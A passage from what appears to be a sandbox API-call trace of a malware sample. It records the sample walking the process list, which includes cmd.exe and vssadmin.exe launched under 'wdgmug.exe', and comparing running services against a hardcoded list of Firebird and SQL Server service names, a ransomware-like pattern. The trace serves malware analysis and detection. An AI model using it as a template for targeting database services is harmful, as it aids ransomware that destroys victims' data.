pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.918] lstrlenW (lpString="wininit.exe") returned 11 [0313.918] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.919] lstrlenW (lpString="csrss.exe") returned 9 [0313.919] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.919] lstrlenW (lpString="winlogon.exe") returned 12 [0313.919] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.920] lstrlenW (lpString="services.exe") returned 12 [0313.920] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.921] lstrlenW (lpString="lsass.exe") returned 9 [0313.921] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0313.921] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0313.921] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0313.922] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0313.922] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.923] lstrlenW (lpString="svchost.exe") returned 11 [0313.923] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.923] lstrlenW (lpString="svchost.exe") returned 11 [0313.923] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.924] lstrlenW (lpString="dwm.exe") returned 7 [0313.924] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.925] lstrlenW (lpString="svchost.exe") returned 11 [0313.925] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.926] lstrlenW (lpString="svchost.exe") returned 11 [0313.926] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.926] lstrlenW (lpString="svchost.exe") returned 11 [0313.926] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.927] lstrlenW (lpString="svchost.exe") returned 11 [0313.927] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.928] lstrlenW (lpString="svchost.exe") returned 11 [0313.928] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.929] lstrlenW (lpString="svchost.exe") returned 11 [0313.929] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.930] lstrlenW (lpString="svchost.exe") returned 11 [0313.930] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.931] lstrlenW (lpString="svchost.exe") returned 11 [0313.931] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.001] lstrlenW (lpString="svchost.exe") returned 11 [0314.001] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.002] lstrlenW (lpString="svchost.exe") returned 11 [0314.002] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.002] lstrlenW (lpString="spoolsv.exe") returned 11 [0314.003] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.003] lstrlenW (lpString="svchost.exe") returned 11 [0314.003] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.004] lstrlenW (lpString="audiodg.exe") returned 11 [0314.004] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0314.005] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0314.005] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0314.006] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0314.006] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0314.006] lstrlenW (lpString="Memory Compression") returned 18 [0314.006] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0314.012] lstrlenW (lpString="sihost.exe") returned 10 [0314.012] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.013] lstrlenW (lpString="svchost.exe") returned 11 [0314.013] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0314.013] lstrlenW (lpString="taskhostw.exe") returned 13 [0314.013] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.014] lstrlenW (lpString="explorer.exe") returned 12 [0314.014] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0314.014] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0314.014] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0314.015] lstrlenW (lpString="SearchUI.exe") returned 12 [0314.015] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0314.015] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0314.016] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.016] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0314.016] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0314.017] lstrlenW (lpString="wdgmug.exe") returned 10 [0314.017] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0314.018] lstrlenW (lpString="cmd.exe") returned 7 [0314.018] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0314.018] lstrlenW (lpString="conhost.exe") returned 11 [0314.018] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0314.019] lstrlenW (lpString="vssadmin.exe") returned 12 [0314.019] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0314.019] lstrlenW (lpString="consent.exe") returned 11 [0314.019] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0314.020] CloseHandle (hObject=0x420) returned 1 [0314.020] Sleep (dwMilliseconds=0x1f4) [0314.957] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a4e0 [0314.958] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0314.959] GetLastError () returned 0xea [0314.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x41539d8 [0314.960] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41539d8, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41539d8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0314.965] CloseServiceHandle (hSCObject=0x401a4e0) returned 1 [0314.982] lstrlenW (lpString="Appinfo") returned 7 [0314.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0314.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0314.982] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0314.983] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0314.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0314.983] lstrlenW (lpString="AppXSvc") returned 7 [0314.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0314.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0314.983] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0314.983] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0314.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0314.983] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0314.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0314.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0314.983] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0314.983] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0314.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0314.983] lstrlenW (lpString="Audiosrv") returned 8 [0314.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0314.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0314.983] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0314.983] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0314.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0314.983] lstrlenW (lpString="BFE") returned 3 [0314.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0314.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0314.983] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0314.983] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0314.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0314.984] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0314.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0314.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0314.984] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0314.984] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0314.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0314.984] lstrlenW (lpString="CDPSvc") returned 6 [0314.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0314.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0314.984] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0314.984] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0314.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0314.984] lstrlenW (lpString="ClickToRunSvc") returned 13 [0314.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0314.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0314.984] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0314.984] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0314.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0314.984] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0314.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0314.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0314.984] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0314.984] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0314.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0314.985] lstrlenW (lpString="CryptSvc") returned 8 [0314.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0314.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0314.985] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0314.985] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0314.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0314.985] lstrlenW (lpString="DcomLaunch") returned 10 [0314.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0314.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0314.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0314.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0314.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0314.985] lstrlenW (lpString="DeviceAssociationService") returned 24 [0314.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0314.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0314.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0314.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0314.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0314.985] lstrlenW (lpString="Dhcp") returned 4 [0314.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0314.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0314.986] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0314.986] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0314.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0314.986] lstrlenW (lpString="Dnscache") returned 8 [0314.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0314.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0314.986] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0314.986] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0314.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0314.986] lstrlenW (lpString="DPS") returned 3 [0314.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0314.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0314.986] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0314.986] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0314.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0314.986] lstrlenW (lpString="DusmSvc") returned 7 [0314.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0314.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0314.986] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0314.986] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0314.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0314.987] lstrlenW (lpString="EventLog") returned 8 [0314.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0314.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0314.987] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0314.987] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0314.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0314.987] lstrlenW (lpString="EventSystem") returned 11 [0314.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0314.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0314.987] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0314.987] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0314.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0314.987] lstrlenW (lpString="FontCache") returned 9 [0314.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0314.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0314.987] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0314.987] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0314.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0314.988] lstrlenW (lpString="gpsvc") returned 5 [0314.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0314.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0314.988] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0314.988] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0314.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0314.988] lstrlenW (lpString="iphlpsvc") returned 8 [0314.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0314.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0314.988] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0314.988] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0314.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0314.988] lstrlenW (lpString="KeyIso") returned 6 [0314.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0314.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0314.988] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0314.988] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0314.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0314.989] lstrlenW (lpString="LanmanServer") returned 12 [0314.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0314.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0314.989] 